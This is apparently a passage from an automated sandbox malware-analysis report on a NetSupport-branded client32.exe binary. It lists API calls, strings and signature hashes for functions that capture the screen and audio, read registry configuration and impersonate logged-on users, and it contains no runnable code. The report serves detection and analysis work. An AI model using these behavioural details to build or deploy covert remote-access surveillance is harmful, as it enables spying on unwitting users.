                                                                                                                                    • TlsAlloc.KERNEL32(?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C8CD
                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C8E8
                                                                                                                                    • EncodePointer.KERNEL32(?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C903
                                                                                                                                    • EncodePointer.KERNEL32(?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C910
                                                                                                                                    • EncodePointer.KERNEL32(?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C91D
                                                                                                                                    • EncodePointer.KERNEL32(?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C92A
                                                                                                                                    • DecodePointer.KERNEL32(Function_0016C68F,?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C94B
                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,1116A39C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C97A
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1116C98C
                                                                                                                                      • Part of subcall function 1116C50B: DecodePointer.KERNEL32(00000007,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C51C
                                                                                                                                      • Part of subcall function 1116C50B: TlsFree.KERNEL32(00000026,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C536
                                                                                                                                      • Part of subcall function 1116C50B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1117448C
                                                                                                                                      • Part of subcall function 1116C50B: DeleteCriticalSection.KERNEL32(00000026,?,?,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 111744B6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$`ehv
                                                                                                                                    • API String ID: 4111557884-2008972137
                                                                                                                                    • Opcode ID: ff100596a171698e0f72d425dcc8a8edb603d79fc51a917646957fdebf1e1d10
                                                                                                                                    • Instruction ID: eae3b44d2d4058427b351dea007f42909421844a0ee85484cf0d8b3efa75680d
                                                                                                                                    • Opcode Fuzzy Hash: ff100596a171698e0f72d425dcc8a8edb603d79fc51a917646957fdebf1e1d10
                                                                                                                                    • Instruction Fuzzy Hash: 8F316AB1D013369BD7219FB58E98B95FFA8AB84738B00063AE83492658EB72D055CF40
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111449B0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 281COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 11144A18
                                                                                                                                    • RaiseException.KERNEL32(80000003,00000000,00000000,00000000), ref: 11144A65
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountExceptionRaiseTick
                                                                                                                                    • String ID: %d.$C:\ProgramData\client32.exe$Support\$_%04d_%02d_%02d_%02d%02d%02d.dmp
                                                                                                                                    • API String ID: 473833368-903289378
                                                                                                                                    • Opcode ID: 4860f3d0019764b5933fc11ddd4e9d7fadde2272faca06d11e84d45086da2242
                                                                                                                                    • Instruction ID: 8647a66d882b2476aed407aa5da18efc97031ce7c35b377ea2f5eba58ac2b1d4
                                                                                                                                    • Opcode Fuzzy Hash: 4860f3d0019764b5933fc11ddd4e9d7fadde2272faca06d11e84d45086da2242
                                                                                                                                    • Instruction Fuzzy Hash: B1A14971944669AFD721CF74CD50BDAF7F4FF48B04F2082A8E959A7A80EB309944CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111D040 Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 418windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • wsprintfA.USER32 ref: 1111D30E
                                                                                                                                    • wsprintfA.USER32 ref: 1111D437
                                                                                                                                      • Part of subcall function 11153730: GetDC.USER32(00000000), ref: 11153763
                                                                                                                                      • Part of subcall function 11153730: CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                                                                      • Part of subcall function 11153730: SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                                                                      • Part of subcall function 11153730: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                                                                      • Part of subcall function 11153730: SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1111D524
                                                                                                                                    • GetLastError.KERNEL32 ref: 1111D532
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1111D55A
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1111D585
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 1111D5C9
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1111D5D7
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1111D62E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111D63B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$CreateDeletewsprintf$CompatibleErrorLast$ExitMessagePaletteProcessSection
                                                                                                                                    • String ID: ..\ctl32\Remote.cpp$DoNewScrape$Error deleting hbmp, e=%d$Error. Unknown colordepth %d for newscrape$Error. b4cvt dst=%p, start=%p, end=%p$Error. cvt overflow dst=%p, start=%p, end=%p$cbUnpacked <= cbMax$workdc
                                                                                                                                    • API String ID: 4138084014-1853163823
                                                                                                                                    • Opcode ID: d3ac6dac5d323a129ecf6fefecdd15c5baa9c2d5b2d8e08ad502837e04970166
                                                                                                                                    • Instruction ID: 2b9f63541b4d259c9eba475547952ab502fd0fc1a2c7f637f53db9b2787f3cd1
                                                                                                                                    • Opcode Fuzzy Hash: d3ac6dac5d323a129ecf6fefecdd15c5baa9c2d5b2d8e08ad502837e04970166
                                                                                                                                    • Instruction Fuzzy Hash: BAF192B1A002169FEB24DB74CD84FDEF7B9AB44304F4485A9E55EAB244D734AE80CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1105F830 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 340COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • wsprintfA.USER32 ref: 1105F890
                                                                                                                                    • wsprintfA.USER32 ref: 1105F8A4
                                                                                                                                    • wsprintfA.USER32 ref: 1105F8FF
                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,00000000,?,80000002,?,00020019), ref: 1105F97F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$EnvironmentExpandStrings
                                                                                                                                    • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                                                                    • API String ID: 2608976442-3241390832
                                                                                                                                    • Opcode ID: 2a903cac9ea3e90876404fd3443ab57c65843769289415fd435a4d2424e95264
                                                                                                                                    • Instruction ID: e96a2cbbb3b754be6409a963181338f47424fc131a1cec65b85ff3420bffa3c7
                                                                                                                                    • Opcode Fuzzy Hash: 2a903cac9ea3e90876404fd3443ab57c65843769289415fd435a4d2424e95264
                                                                                                                                    • Instruction Fuzzy Hash: 89D1C375D0126EAEDB61DB64DD54BDEB7B8AF19309F0000D8D909A3181FB746B84CFA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100C0F0 Relevance: 30.1, APIs: 12, Strings: 5, Instructions: 332sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedIncrement.KERNEL32(111EDE24), ref: 1100C10D
                                                                                                                                    • WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 1100C1D3
                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?), ref: 1100C1E0
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1100C204
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1100C24D
                                                                                                                                      • Part of subcall function 1100B440: EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,20F29797,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                                                      • Part of subcall function 1100B440: CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                                                                      • Part of subcall function 1100B440: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                                                                      • Part of subcall function 1100B440: LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1100C419
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C435
                                                                                                                                    • waveInUnprepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C442
                                                                                                                                    • waveInPrepareHeader.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C44F
                                                                                                                                    • waveInAddBuffer.WINMM(?,00000000,00000020,?,?,00000000,?), ref: 1100C45C
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?), ref: 1100C463
                                                                                                                                    • InterlockedDecrement.KERNEL32(111EDE24), ref: 1100C506
                                                                                                                                    Strings
                                                                                                                                    • Vista AudioCap FreeInstance (pAudioCap=%p), xrefs: 1100C4E1
                                                                                                                                    • Audiothread started, threadcnt=%d, xrefs: 1100C119
                                                                                                                                    • Error %d waiting for audio (nEvents=%d), xrefs: 1100C1F2
                                                                                                                                    • Audio, xrefs: 1100C0FB
                                                                                                                                    • Audiothread stopped, threadcnt=%d, xrefs: 1100C513
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$wave$CountCreateEnterHeaderInterlockedLeaveTick$BufferDecrementErrorEventFileIncrementLastMultipleObjectsPrepareSleepUnprepareWait
                                                                                                                                    • String ID: Audio$Audiothread started, threadcnt=%d$Audiothread stopped, threadcnt=%d$Error %d waiting for audio (nEvents=%d)$Vista AudioCap FreeInstance (pAudioCap=%p)
                                                                                                                                    • API String ID: 931594146-3268596948
                                                                                                                                    • Opcode ID: 8b355c5db468c8f61bac5f13f0e33c55d36369677e20b5308214b4dacb377572
                                                                                                                                    • Instruction ID: ce4536ffc1536091952ef6b0c0b09b4d7bc44372ab8792d62394f68665881c24
                                                                                                                                    • Opcode Fuzzy Hash: 8b355c5db468c8f61bac5f13f0e33c55d36369677e20b5308214b4dacb377572
                                                                                                                                    • Instruction Fuzzy Hash: 66C1E774E00717ABF708CFB4C984BAEF7A4FF45348F1082A5E96996641EB30B951CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11144580 Relevance: 27.2, APIs: 11, Strings: 7, Instructions: 191COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf
                                                                                                                                    • String ID: (%d.%02d.%d.%d)$ + %d bytes$%s + %d bytes$, %s, Line %d$0x%08X $<unknown module>$<unknown symbol>
                                                                                                                                    • API String ID: 2111968516-983257157
                                                                                                                                    • Opcode ID: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
                                                                                                                                    • Instruction ID: 293bca24da915293cfb006549a27a8b3087cf55c4de6a639cfa4b0299eb0fa9d
                                                                                                                                    • Opcode Fuzzy Hash: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
                                                                                                                                    • Instruction Fuzzy Hash: 675185B1940629ABDB25CB258C40FEAF3BCAF45708F0041D9FD08A2640EB75AB55CFA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11003691
                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                                                                      • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                                                                    • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 11003721
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                                                                    • GetSysColor.USER32(00000014), ref: 11003755
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003783
                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                                                                                    • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                                                                    • DeleteObject.GDI32(?), ref: 110037DE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3698065672-0
                                                                                                                                    • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                                                                    • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                                                                    • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                                                                    • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11002340 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 162windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11001F80: FindWindowA.USER32 ref: 11001FA9
                                                                                                                                      • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                                                                      • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                                                                      • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                                                                      • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                                                                      • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                                                                      • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                                                                      • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110023AD
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 110023BD
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110023D1
                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11002401
                                                                                                                                      • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
